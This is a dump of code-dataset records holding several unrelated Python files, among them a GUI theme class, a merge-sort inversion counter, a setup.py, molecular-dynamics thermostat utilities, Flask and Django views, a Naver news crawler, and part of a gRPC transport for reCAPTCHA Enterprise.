self.text_box_texture = \"\"\n self.__font = Font()\n\n font = property(\n lambda self: self.__font,\n None,\n None,\n \"Font of theme\"\n )\n\n def add_button_textures(self, normal, hover=None, clicked=None, locked=None):\n normal_texture = arcade.load_texture(normal)\n self.button_textures['normal'] = normal_texture\n\n self.button_textures['hover'] = arcade.load_texture(hover) \\\n if hover is not None else normal_texture\n self.button_textures['clicked'] = arcade.load_texture(clicked) \\\n if clicked is not None else normal_texture\n self.button_textures['locked'] = arcade.load_texture(locked) \\\n if locked is not None else normal_texture\n\n def add_window_texture(self, window_texture):\n self.window_texture = arcade.load_texture(window_texture)\n\n def add_menu_texture(self, menu_texture):\n self.menu_texture = arcade.load_texture(menu_texture)\n\n def add_dialogue_box_texture(self, dialogue_box_texture):\n self.dialogue_box_texture = arcade.load_texture(dialogue_box_texture)\n\n def add_text_box_texture(self, text_box_texture):\n self.text_box_texture = arcade.load_texture(text_box_texture)\n\n def set_font(self, font_size, font_color, font_name=None):\n \"\"\" Deprecated. Set font. \"\"\"\n\n import warnings\n warnings.warn(\"set_font has been deprecated, please use Theme.font attribute instead.\", DeprecationWarning)\n\n self.font.color = font_color\n self.font.size = font_size\n self.font.name = font_name \\\n if font_name is not None \\\n else Font.DEFAULT_NAME\n","sub_path":"arcade/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":17529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"263343289","text":"#####################################\n## Calc the inverse number for arr\n#####################################\ndef inverseNumber( arr ):\n return __calcInverseNumber( arr[:] , 0 , len(arr))\n\ndef __calcInverseNumber( arr , l , r ):\n\n if r - l <= 1:\n return 0\n \n res1 = __calcInverseNumber( arr , l , l + (r-l)//2 )\n res2 = __calcInverseNumber( arr , l + (r-l)//2 , r )\n res = __mergeSortAndCalcInverseNumber( arr , l , r ) + res1 + res2\n #print(\"[DEBUG] the inverse number of arr[\",l,\",\",r,\"] is\",res)\n return res\n\ndef __mergeSortAndCalcInverseNumber( arr , l , r ):\n\n sortedArr = []\n res = 0\n\n i = l\n j = l + (r-l)//2\n while i < l + (r-l)//2 and j < r:\n if arr[i] <= arr[j]:\n sortedArr.append( arr[i] )\n i += 1\n else:\n sortedArr.append( arr[j] )\n res += ( l + (r-l)//2 - i)\n j += 1\n\n while i < l + (r-l)//2:\n sortedArr.append( arr[i] )\n i += 1\n\n while j < r:\n sortedArr.append( arr[j] )\n #res += ( l + (r-l)//2 - i )\n j += 1\n\n arr[l:r] = sortedArr\n \n return res\n\nif __name__ == \"__main__\":\n N = int(input())\n arr = [int(input()) for i in range(N)]\n print( inverseNumber(arr) )\n","sub_path":"00Basic/1019.py","file_name":"1019.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"121824690","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"The setup script.\"\"\"\n\nfrom setuptools import setup, find_packages\nimport os, re, io\n\n####################################\n# Package meta-data.\n####################################\nname = 'python-tsl2591'\npackage = 'python_tsl2591'\ndescription = \"Community-coded Python module for TSL2591 sensor converted from Adafruit's TSL2591 library. Use at your own risk.\"\nurl = 'http://github.com/kyletaylored/python-tsl2591'\nemail = 'maxhofb@gmail.com'\nauthor = 'Max Hofbauer'\n\n# What packages are required for this module to be executed?\nrequirements = ['smbus2>=0.2', ]\n\nsetup_requirements = [ ]\n\ntest_requirements = [ ]\n\n# What packages are optional?\nextras = {\n # 'fancy feature': ['django'],\n}\n####################################\n# End Metadata\n####################################\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\n# Import the README and use it as the long-description.\n# Note: this will only work if 'README.md' is present in your MANIFEST.in file!\ntry:\n with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = '\\n' + f.read()\nexcept FileNotFoundError:\n long_description = DESCRIPTION\n\n# Load the package's __version__.py.\nverstr = \"Unknown\"\nVERSIONFILE = os.path.join(package, \"__version__.py\")\nverstrline = open(VERSIONFILE, \"rt\").read()\nVSRE = r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\"\nmo = re.search(VSRE, verstrline, re.M)\nif mo:\n verstr = mo.group(1)\nelse:\n raise RuntimeError(\"Unable to find version string in %s.\" % (VERSIONFILE,))\n\n####################################\n# Setuptools\n####################################\nsetup(\n author=author,\n author_email=email,\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n \"Programming Language :: Python :: 2\",\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n \"Operating System :: POSIX :: Linux\",\n ],\n description=description,\n install_requires=requirements,\n extras_require=extras,\n license=\"MIT license\",\n long_description=long_description,\n long_description_content_type='text/markdown',\n include_package_data=True,\n keywords=['python_tsl2591', 'tsl2591', 'light sensor', 'adafruit'],\n name=name,\n packages=find_packages(include=['python_tsl2591']),\n setup_requires=setup_requirements,\n url=url,\n version=verstr,\n zip_safe=False,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"345796720","text":"import numpy as np\nimport torch\nfrom ase import units\n\nfrom schnetpack.md.utils import MDUnits\n\n# __all__ = [\n# \"load_gle_matrices\",\n# \"GLEMatrixParser\",\n# \"YSWeights\"\n# ]\n\n\ndef load_gle_matrices(filename):\n \"\"\"\n Load GLE thermostat files formatted in raw format as generated via http://gle4md.org/index.html?page=matrix\n The generated matrices are torch tensors of the shape normal_modes x s+1 x s+1, where normal_modes is 1 except in\n the case of the PIGLET thermostat and s is the number of degrees of freedom added via GLE. Automatically recognizes\n used units and converts them to atomic units.\n\n Args:\n filename (str): Path to the file the GLE thermostat parameters should be loaded from.\n\n Returns:\n tuple: Tuple of two square torch tensors containing the a_matrix and c_matrix parameters required to\n initialize GLE type thermostats.\n \"\"\"\n a_matrix = GLEMatrixParser(\n \"A MATRIX:\", stop=\"C MATRIX:\", split=\"Matrix for normal mode\"\n )\n c_matrix = GLEMatrixParser(\"C MATRIX:\", split=\"Matrix for normal mode\")\n\n try:\n with open(filename) as glefile:\n for line in glefile:\n a_matrix.read_line(line)\n c_matrix.read_line(line)\n except FileNotFoundError:\n raise FileNotFoundError(\n \"Could not open {:s} for reading. Please use GLE parameter files \"\n \"generated via http://gle4md.org/index.html?page=matrix\".format(filename)\n )\n\n return a_matrix.matrix, c_matrix.matrix\n\n\nclass GLEMatrixParser:\n \"\"\"\n General parser for GLE thermostat files. Reads from start string until end of file or a given stop string. If the\n argument split is specified, the read matrices are split at the given token. Automatically recognizes\n used units and converts them to atomic units.\n\n Args:\n start (str): Token when to start reading.\n stop (str): Token when to stop reading. If None (default) reads until eno of file.\n split (str): If the given token is encountered, matrices are split at this point. If None (default), no split is\n performed.\n \"\"\"\n\n # Automatically recognized format and converts to units\n unit_conversions = {\n \"atomic time units^-1\": 1,\n \"picoseconds^-1\": 1 / 1000 / MDUnits.fs2atu,\n \"seconds^-1\": units._aut,\n \"femtoseconds^-1\": 1 / MDUnits.fs2atu,\n \"eV\": 1 / units.Ha,\n \"atomic energy units\": 1,\n \"K\": MDUnits.kB,\n }\n\n def __init__(self, start, stop=None, split=None):\n self.start = start\n self.stop = stop\n self.split = split\n self.read = False\n self.units = None\n self._matrix = []\n self._tmp_matrix = []\n\n def read_line(self, line):\n \"\"\"\n Read and parse a line obtained from an open file object containing GLE parameters.\n\n Args:\n line (str): Line of a GLE parameter file.\n \"\"\"\n line = line.strip()\n # Filter for empty lines\n if line:\n # Check if start token is present\n if self.start in line:\n self.read = True\n # Get units used\n unit_name = line.split(\"(\")[-1].replace(\")\", \"\")\n self.units = self.unit_conversions[unit_name]\n elif self.read:\n if line.startswith(\"#\"):\n # Check for stop and split tokens\n if self.stop is not None and self.stop in line:\n self.read = False\n if self.split is not None and self.split in line:\n if len(self._tmp_matrix) > 0:\n self._matrix.append(self._tmp_matrix)\n self._tmp_matrix = []\n else:\n # Otherwise read and parse line\n self._tmp_matrix.append([float(x) for x in line.split()])\n\n @property\n def matrix(self):\n \"\"\"\n Property to get parsed matrices converted to numpy arrays using atomic units.\n\n Returns:\n numpy.array: Array of the parsed GLE matrix with the shape normal_modes x s+1 x s+1, where normal_modes is 1\n except in the case of the PIGLET thermostat and s is the number of degrees of freedom added via\n GLE. If no matrix is found, None is returned.\n \"\"\"\n # Write out last buffer\n if len(self._tmp_matrix) > 0:\n self._matrix.append(self._tmp_matrix)\n # Convert to numpy array\n _matrix = np.array(self._matrix)\n # Perform unit conversion\n if self.units is not None:\n return _matrix * self.units\n else:\n return None\n\n\nclass YSWeights:\n \"\"\"\n Weights for Yoshida-Suzuki integration used in propagating the Nose-Hoover chain thermostats.\n\n Args:\n device (str): Device used for computation (default='cuda').\n \"\"\"\n\n YS_weights = {\n 3: np.array([1.35120719195966, -1.70241438391932, 1.35120719195966]),\n 5: np.array(\n [\n 0.41449077179438,\n 0.41449077179438,\n -0.65796308717750,\n 0.41449077179438,\n 0.41449077179438,\n ]\n ),\n 7: np.array(\n [\n -1.17767998417887,\n 0.23557321335936,\n 0.78451361047756,\n 1.31518632068390,\n 0.78451361047756,\n 0.23557321335936,\n -1.17767998417887,\n ]\n ),\n }\n\n def __init__(self, device):\n self.device = device\n\n def get_weights(self, order):\n \"\"\"\n Get the weights required for an integration scheme of the desired order.\n\n Args:\n order (int): Desired order of the integration scheme.\n\n Returns:\n torch.Tensor: Tensor of the integration weights\n \"\"\"\n if order not in self.YS_weights:\n raise ValueError(\n \"Order {:d} not supported for YS integration weights\".format(order)\n )\n else:\n ys_weights = (\n torch.from_numpy(self.YS_weights[order]).float().to(self.device)\n )\n return ys_weights\n","sub_path":"schnetpack/md/utils/thermostat_utils.py","file_name":"thermostat_utils.py","file_ext":"py","file_size_in_byte":6305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"210542425","text":"from flask import Blueprint, redirect, url_for, request, render_template, flash\nfrom app import db\nfrom app.models import MenuItem, Restaurant, User\n\n# Define the blueprint: 'auth', set its url prefix: mod_home.url/auth\nmod_menu_item = Blueprint('menu_item', __name__, url_prefix='/', template_folder='mod_menu_item',\n static_folder='mod_home')\n\n\n@mod_menu_item.route('restaurant//new/', methods=['GET', 'POST'])\ndef new_menu_item(restaurant_id):\n \"\"\"\n Add a new menu item to the restaurant\n \"\"\"\n if request.method == \"POST\":\n restaurant = Restaurant.query.filter_by(id=restaurant_id)\n menu_item = MenuItem(name=request.form['name'], course=request.form['course'],\n description=request.form['description'], price=request.form['price'],\n restaurant=restaurant)\n db.session.add(menu_item)\n db.session.commit()\n return redirect(url_for('home.restaurants', restaurant_id=restaurant_id))\n else:\n return render_template('menu_item/new_menu_item.html', restaurant_id=restaurant_id)\n\n\n@mod_menu_item.route('/restaurant///edit/', methods=['POST', 'GET'])\ndef edit_menu_item(restaurant_id, menu_id):\n \"\"\"\n Allows user to edit a menu item from a specific restaurant\n \"\"\"\n edited_item = None\n if request.method == 'POST':\n if request.form['name']:\n edited_item = MenuItem.query.filter_by(id=menu_id).one()\n edited_item = request.form[\"name\"]\n db.session.add(edited_item)\n db.session.commit()\n return redirect(url_for('home.restaurantMenu', restaurant_id=restaurant_id))\n else:\n return render_template('menu_item/edit_menu_item.html', restaurant_id=restaurant_id,\n MenuID=menu_id,\n item=edited_item)\n\n\n@mod_menu_item.route('retaurant///delete/')\ndef delete_menu_item(restaurant_id, menu_id):\n \"\"\"\n Allows user to delete a specific menu item from a specific restaurant\n \"\"\"\n return \"page to delete a menu item. Task 3 complete!\"\n","sub_path":"app/mod_menu_item/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"72327863","text":"def max_profit(prices):\n min_buy = float('inf')\n max_pro = 0\n\n for price in prices:\n min_buy = min(min_buy, price)\n max_pro = max(max_pro, price - min_buy)\n \n return max_pro\n\n\nif __name__ == '__main__':\n prices = [310, 315, 275, 295, 260, 270, 290, 230, 255, 250]\n print(max_profit(prices))","sub_path":"algos_recap/max_profit.py","file_name":"max_profit.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"499342442","text":"from preprocess.textfilter import textfilter\nfrom preprocess.QAgenerator import QAgenerator \nfrom preprocess.features_generator import features_generator\nfrom preprocess.tfidfgenerator import tfidfgenerator \n\ndef main():\n\tfile_route = \"/Users/ink/Documents/testbot.txt\"\n\ttext_filter = textfilter(file_route)\n\torig_data = text_filter.remove_url() # remove the url from the data\n\n\tqa_generator = QAgenerator(orig_data)\n\tqa_generator.processData()\n\n\tanswers = qa_generator.get_answers()\n\tquestions = qa_generator.get_questions()\n\n\tfeature_gen = features_generator()\n\tans_tokens = feature_gen.get_tokens(answers)\n\tques_tokens = feature_gen.get_tokens(questions)\n\n\tprint(ans_tokens)\n\tprint(ques_tokens)\n\n\tans_pinyin = feature_gen.get_pinyin(ans_tokens)\n\tques_pinyin = feature_gen.get_pinyin(ques_tokens)\n\n\tprint(ans_pinyin)\n\tprint(ques_pinyin)\n\n\ttfidf_gen = tfidfgenerator()\n\n\tans_tfidf, ans_shape = tfidf_gen.get_tfidf(answers)\n\tquest_tfidf, quest_shape = tfidf_gen.get_tfidf(questions)\n\tprint(ans_shape)\n\tprint(quest_shape)\n\nmain()\n\n\n\n\n","sub_path":"source/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"583609159","text":"from bs4 import BeautifulSoup\nfrom datetime import datetime\nimport requests\nimport urllib.request\nfrom urllib.parse import quote\nimport configparser\nimport pandas as pd\nimport re\n\n'''''''''''''''''''''''''''''''''''''''''''''''''''''''''\n< naver 뉴스 검색시 리스트 크롤링하는 프로그램 > _select사용\n- 크롤링 해오는 것 : 링크,제목,신문사,날짜,내용요약본\n- 날짜,내용요약본 -> 정제 작업 필요\n- 리스트 -> 딕셔너리 -> df -> 엑셀로 저장 \n'''''''''''''''''''''''''''''''''''''''''''''''''''''''''\n\nclass NaverNewsCrawler():\n #각 크롤링 결과 저장하기 위한 리스트 선언 \n # title_text=[]\n # link_text=[]\n # source_text=[]\n # date_text=[]\n # contents_text=[]\n # result={}\n\n #엑셀로 저장하기 위한 변수\n \n # now = datetime.now() #파일이름 현 시간으로 저장하기\n\n def __init__(self):\n config = configparser.RawConfigParser()\n config.read('conf/config.ini')\n self.title_text=[]\n self.link_text=[]\n self.press_text=[]\n self.info_text=[]\n self.date_text=[]\n self.contents_text=[]\n self.article_text=[]\n self.result={} \n self.RESULT_PATH ='D:/crawling_result/Naver_News/' #결과 저장할 경로\n self.now = datetime.now() #파일이름 현 시간으로 저장하기\n\n #날짜 정제화 함수\n def date_cleansing(self, test):\n try:\n #지난 뉴스\n #머니투데이 10면1단 2018.11.05. 네이버뉴스 보내기 \n pattern = '\\d+.(\\d+).(\\d+).' #정규표현식 \n \n r = re.compile(pattern)\n match = r.search(test).group(0) # 2018.11.05.\n date_text.append(match)\n \n except AttributeError:\n #최근 뉴스\n #이데일리 1시간 전 네이버뉴스 보내기 \n pattern = '\\w* (\\d\\w*)' #정규표현식 \n \n r = re.compile(pattern)\n match = r.search(test).group(1)\n #print(match)\n date_text.append(match)\n\n #내용 정제화 함수 \n def contents_cleansing(self, contents):\n first_cleansing_contents = re.sub('
    .*?
    ', '', \n str(contents)).strip() #앞에 필요없는 부분 제거\n second_cleansing_contents = re.sub('
      .*?
    ', '', \n first_cleansing_contents).strip()#뒤에 필요없는 부분 제거 (새끼 기사)\n third_cleansing_contents = re.sub('<.+?>', '', second_cleansing_contents).strip()\n contents_text.append(third_cleansing_contents)\n #print(contents_text)\n\n def get_article(self, url):\n text = \"\"\n if url is None:\n return \"\"\n\n try: \n print(\"news url\", url)\n news_link = urllib.request.urlopen(url).read() \n soup = BeautifulSoup(news_link, 'html.parser') \n except:\n return \"\"\n \n # 연합뉴스\n if ('://yna' in url) | ('app.yonhapnews' in url): \n main_article = soup.find('div', {'class':'story-news article'})\n if main_article == None:\n main_article = soup.find('div', {'class' : 'article-txt'})\n if main_article == None:\n main_article = soup.find('article')\n\n if main_article != None: \n text = main_article.text\n else:\n text = \"\"\n \n # MBC \n elif '//imnews.imbc' in url: \n text = soup.find('div', {'itemprop' : 'articleBody'}).text\n \n # 매일경제(미라클), req.encoding = None 설정 필요\n elif 'mirakle.mk' in url:\n text = soup.find('div', {'class' : 'view_txt'}).text\n \n # 매일경제, req.encoding = None 설정 필요\n elif 'mk.co' in url:\n text = soup.find('div', {'class' : 'art_txt'}).text\n \n # SBS\n elif 'news.sbs' in url:\n text = soup.find('div', {'itemprop' : 'articleBody'}).text\n \n # KBS\n elif 'news.kbs' in url:\n text = soup.find('div', {'id' : 'cont_newstext'}).text\n \n # JTBC\n elif 'news.jtbc' in url:\n text = soup.find('div', {'class' : 'article_content'}).text\n \n # 그 외\n else:\n text = \"\"\n \n return text.replace('\\n','').replace('\\r','').replace('
    ','').replace('\\t','') \n\n def crawler(self, maxpage,query,sort,s_date,e_date):\n url_query = quote(query)\n s_from = s_date.replace(\".\",\"\")\n e_to = e_date.replace(\".\",\"\")\n page = 1 \n maxpage_t =(int(maxpage)-1)*10+1 # 11= 2페이지 21=3페이지 31=4페이지 ...81=9페이지 , 91=10페이지, 101=11페이지\n \n while page <= maxpage_t:\n print(\"page\", page, maxpage_t)\n url = \"https://search.naver.com/search.naver?where=news&query=\" + url_query + \"&sort=\"+sort+\"&ds=\" + s_date + \"&de=\" + e_date + \"&nso=so%3Ar%2Cp%3Afrom\" + s_from + \"to\" + e_to + \"%2Ca%3A&start=\" + str(page)\n print(\"search url\", url)\n # response = requests.get(url)\n # html = response.text\n search_url = urllib.request.urlopen(url).read()\n\n #뷰티풀소프의 인자값 지정\n soup = BeautifulSoup(search_url, 'html.parser')\n\n table = soup.find('ul',{'class' : 'list_news'})\n li_list = table.find_all('li', {'id': re.compile('sp_nws.*')})\n area_list = [li.find('div', {'class' : 'news_area'}) for li in li_list]\n # title_list = [area.find('a', {'class' : 'news_tit'}) for area in area_list]\n # contents_list = [area.find('div', {'class' : 'news_dsc'}) for area in area_list]\n # press_list = [area.find('a', {'class' : 'info press'}) for area in area_list]\n # info_list = [area.find('a', {'class' : 'info'}) for area in area_list]\n\n for area in area_list:\n self.title_text.append(area.find('a', {'class' : 'news_tit'}).get('title')) #제목\n self.link_text.append(area.find('a', {'class' : 'news_tit'}).get('href')) #링크주소\n self.article_text.append(self.get_article(area.find('a', {'class' : 'news_tit'}).get('href'))) #신문 본문\n self.press_text.append(area.find('a', {'class' : 'info press'}).get_text()) #언론사\n self.info_text.append(area.find('a', {'class' : 'info'}).get_text()) #네이버신문 \n self.contents_text.append(area.find('div', {'class' : 'news_dsc'}).get_text()) #네이버신문 요약 \n\n # for title in title_list:\n # self.title_text.append(title.get('title')) #제목\n # self.link_text.append(title.get('href')) #링크주소\n # self.article_text.append(\"\")\n # # self.article_text.append(self.get_article(title.get('href')))\n\n\n # for press in press_list:\n # self.press_text.append(press.get_text()) #언론사\n\n # for info in info_list:\n # self.info_text.append(info.get_text()) #네이버신문\n\n # for contents in contents_list:\n # self.contents_text.append(contents.get_text()) #네이버신문 요약 \n\n # if(new_url == '#'):\n # continue\n # else:\n # news_link = urllib.request.urlopen(new_url).read()\n # news_html = BeautifulSoup(new_link, 'html.parser')\n # news_title = news_html.find('h3', {'id':'articleTitle'}).get_text()\n # news_datetime = news_html.find('span', {'class':'t11'}).get_text()\n # news_article = news_html.find('div', {'id':'articleBodyContents'}).get_text()\n\n # news_df.loc[idx] = [news_title, news_url, press, news_datetime, news_article]\n # idx += 1\n # print(\"#\", end=\"\")\n\n # #태그에서 제목과 링크주소 추출\n # atags = soup.select('._sp_each_title')\n # print(\"atags text\", atags)\n # for atag in atags:\n # self.title_text.append(atag.text) #제목\n # self.link_text.append(atag['href']) #링크주소\n \n # print(\"title text\", self.title_text)\n # #신문사 추출\n # source_lists = soup.select('._sp_each_source')\n # for source_list in source_lists:\n # source_text.append(source_list.text) #신문사\n \n # #날짜 추출 \n # date_lists = soup.select('.txt_inline')\n # for date_list in date_lists:\n # test=date_list.text \n # date_cleansing(test) #날짜 정제 함수사용 \n \n # #본문요약본\n # contents_lists = soup.select('ul.type01 dl')\n # for contents_list in contents_lists:\n # #print('==='*40)\n # #print(contents_list)\n # contents_cleansing(contents_list) #본문요약 정제화\n \n \n # 모든 리스트 딕셔너리형태로 저장\n self.result= {\"title\":self.title_text , \"link\":self.link_text, \"press\" : self.press_text, \"info\" : self.info_text, \"contents\" : self.contents_text, \"article\" : self.article_text } \n # self.result= {\"date\" : self.date_text , \"title\":self.title_text , \"source\" : self.source_text ,\"contents\": self.contents_text ,\"link\":self.link_text } \n # # result= {\"date\" : date_text , \"title\":title_text , \"source\" : source_text ,\"contents\": contents_text ,\"link\":link_text } \n # print(page)\n \n df = pd.DataFrame(self.result) #df로 변환\n page += 10\n \n \n # 새로 만들 파일이름 지정\n outputFileName = 'Naver News %s-%s-%s %s시 %s분 %s초 merging.xlsx' % (self.now.year, self.now.month, self.now.day, self.now.hour, self.now.minute, self.now.second)\n df.to_excel(self.RESULT_PATH+outputFileName,sheet_name='sheet1') \n\n\nif __name__ == \"__main__\":\n crawler = NaverNewsCrawler()\n crawler.crawler(1, \"인공지능\",\"1\",\"2021.01.04\",\"2021.04.30\")","sub_path":"StockAnalyzer/common/materialanalysis/news_crawler/search_news_crawler.py","file_name":"search_news_crawler.py","file_ext":"py","file_size_in_byte":10577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"179978349","text":"from django.views.generic import ListView, DetailView\nfrom django.shortcuts import render, HttpResponseRedirect, redirect, get_object_or_404\nfrom django.contrib.auth import logout as auth_logout\nfrom django.core.exceptions import ObjectDoesNotExist\n\nfrom django.contrib.auth.models import User\nfrom social.apps.django_app.default.models import UserSocialAuth\nfrom photo.models import Photo\nfrom userprofile.models import UserProfile\nfrom workspaces.forms import UserSettingsForm, UserProfileForm\n\n\ndef home_page(request):\n context = ''\n return render(request, 'base.html', context)\n\n\nclass UserList(ListView):\n model = User\n context_object_name = 'users'\n template_name = 'user_list.html'\n\n def get_context_data(self, **kwargs):\n context = super(UserList, self).get_context_data(**kwargs)\n context['user_profiles'] = UserProfile.objects.all()\n return context\n\n\ndef user_detail(request, username):\n user = get_object_or_404(User, username=username)\n try:\n user_profile = UserProfile.objects.get(user_id=user)\n except ObjectDoesNotExist:\n user_profile = {}\n try:\n user_social_auth = UserSocialAuth.objects.filter(user=user)\n except ObjectDoesNotExist:\n user_social_auth = {}\n photos = Photo.objects.filter(created_by=user)\n context = {'user': user, 'user_social_auth': user_social_auth, 'photos': photos, 'user_profile': user_profile}\n return render(request, 'user_detail.html', context)\n\n\ndef user_settings(request):\n user = get_object_or_404(User, username=request.user.username)\n try:\n user_profile = UserProfile.objects.get(user_id=user)\n except ObjectDoesNotExist:\n user_profile = UserProfile.objects.create(user_id=user.id)\n form_user_settings = UserSettingsForm(request.POST or None, instance=user)\n form_user_profile = UserProfileForm(request.POST or None, request.FILES or None, instance=user_profile)\n\n if request.method == 'POST':\n if form_user_settings.is_valid() and form_user_profile.is_valid():\n form_user_settings.save()\n form_user_profile.save()\n return redirect('/settings')\n return render(request, 'user_settings.html', {'form_user_settings': form_user_settings,\n 'form_user_profile': form_user_profile})\n\ndef logout(request):\n \"\"\"Logs out user\"\"\"\n auth_logout(request)\n return HttpResponseRedirect('/')\n","sub_path":"workspaces/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"113167889","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nfrom typing import Callable, Dict, Tuple\n\nfrom google.api_core import grpc_helpers # type: ignore\nfrom google.auth import credentials # type: ignore\nfrom google.auth.transport.grpc import SslCredentials # type: ignore\n\n\nimport grpc # type: ignore\n\nfrom google.cloud.recaptchaenterprise_v1.types import recaptchaenterprise\nfrom google.protobuf import empty_pb2 as empty # type: ignore\n\nfrom .base import RecaptchaEnterpriseServiceTransport\n\n\nclass RecaptchaEnterpriseServiceGrpcTransport(RecaptchaEnterpriseServiceTransport):\n \"\"\"gRPC backend transport for RecaptchaEnterpriseService.\n\n Service to determine the likelihood an event is legitimate.\n\n This class defines the same methods as the primary client, so the\n primary client can load the underlying transport implementation\n and call it.\n\n It sends protocol buffers over the wire using gRPC (which is built on\n top of HTTP/2); the ``grpcio`` package must be installed.\n \"\"\"\n\n def __init__(\n self,\n *,\n host: str = \"recaptchaenterprise.googleapis.com\",\n credentials: credentials.Credentials = None,\n channel: grpc.Channel = None,\n api_mtls_endpoint: str = None,\n client_cert_source: Callable[[], Tuple[bytes, bytes]] = None\n ) -> None:\n \"\"\"Instantiate the transport.\n\n Args:\n host (Optional[str]): The hostname to connect to.\n credentials (Optional[google.auth.credentials.Credentials]): The\n authorization credentials to attach to requests. These\n credentials identify the application to the service; if none\n are specified, the client will attempt to ascertain the\n credentials from the environment.\n This argument is ignored if ``channel`` is provided.\n channel (Optional[grpc.Channel]): A ``Channel`` instance through\n which to make calls.\n api_mtls_endpoint (Optional[str]): The mutual TLS endpoint. If\n provided, it overrides the ``host`` argument and tries to create\n a mutual TLS channel with client SSL credentials from\n ``client_cert_source`` or applicatin default SSL credentials.\n client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]): A\n callback to provide client SSL certificate bytes and private key\n bytes, both in PEM format. It is ignored if ``api_mtls_endpoint``\n is None.\n\n Raises:\n google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport\n creation failed for any reason.\n \"\"\"\n if channel:\n # Sanity check: Ensure that channel and credentials are not both\n # provided.\n credentials = False\n\n # If a channel was explicitly provided, set it.\n self._grpc_channel = channel\n elif api_mtls_endpoint:\n host = (\n api_mtls_endpoint\n if \":\" in api_mtls_endpoint\n else api_mtls_endpoint + \":443\"\n )\n\n # Create SSL credentials with client_cert_source or application\n # default SSL credentials.\n if client_cert_source:\n cert, key = client_cert_source()\n ssl_credentials = grpc.ssl_channel_credentials(\n certificate_chain=cert, private_key=key\n )\n else:\n ssl_credentials = SslCredentials().ssl_credentials\n\n # create a new channel. The provided one is ignored.\n self._grpc_channel = grpc_helpers.create_channel(\n host,\n credentials=credentials,\n ssl_credentials=ssl_credentials,\n scopes=self.AUTH_SCOPES,\n )\n\n # Run the base constructor.\n super().__init__(host=host, credentials=credentials)\n self._stubs = {} # type: Dict[str, Callable]\n\n @classmethod\n def create_channel(\n cls,\n host: str = \"recaptchaenterprise.googleapis.com\",\n credentials: credentials.Credentials = None,\n **kwargs\n ) -> grpc.Channel:\n \"\"\"Create and return a gRPC channel object.\n Args:\n address (Optionsl[str]): The host for the channel to use.\n credentials (Optional[~.Credentials]): The\n authorization credentials to attach to requests. These\n credentials identify this application to the service. If\n none are specified, the client will attempt to ascertain\n the credentials from the environment.\n kwargs (Optional[dict]): Keyword arguments, which are passed to the\n channel creation.\n Returns:\n grpc.Channel: A gRPC channel object.\n \"\"\"\n return grpc_helpers.create_channel(\n host, credentials=credentials, scopes=cls.AUTH_SCOPES, **kwargs\n )\n\n @property\n def grpc_channel(self) -> grpc.Channel:\n \"\"\"Create the channel designed to connect to this service.\n\n This property caches on the instance; repeated calls return\n the same channel.\n \"\"\"\n # Sanity check: Only create a new channel if we do not already\n # have one.\n if not hasattr(self, \"_grpc_channel\"):\n self._grpc_channel = self.create_channel(\n self._host, credentials=self._credentials\n )\n\n # Return the channel from cache.\n return self._grpc_channel\n\n @property\n def create_assessment(\n self\n ) -> Callable[\n [recaptchaenterprise.CreateAssessmentRequest], recaptchaenterprise.Assessment\n ]:\n r\"\"\"Return a callable for the create assessment method over gRPC.\n\n Creates an Assessment of the likelihood an event is\n legitimate.\n\n Returns:\n Callable[[~.CreateAssessmentRequest],\n ~.Assessment]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"create_assessment\" not in self._stubs:\n self._stubs[\"create_assessment\"] = self.grpc_channel.unary_unary(\n \"/google.cloud.recaptchaenterprise.v1.RecaptchaEnterpriseService/CreateAssessment\",\n request_serializer=recaptchaenterprise.CreateAssessmentRequest.serialize,\n response_deserializer=recaptchaenterprise.Assessment.deserialize,\n )\n return self._stubs[\"create_assessment\"]\n\n @property\n def annotate_assessment(\n self\n ) -> Callable[\n [recaptchaenterprise.AnnotateAssessmentRequest],\n recaptchaenterprise.AnnotateAssessmentResponse,\n ]:\n r\"\"\"Return a callable for the annotate assessment method over 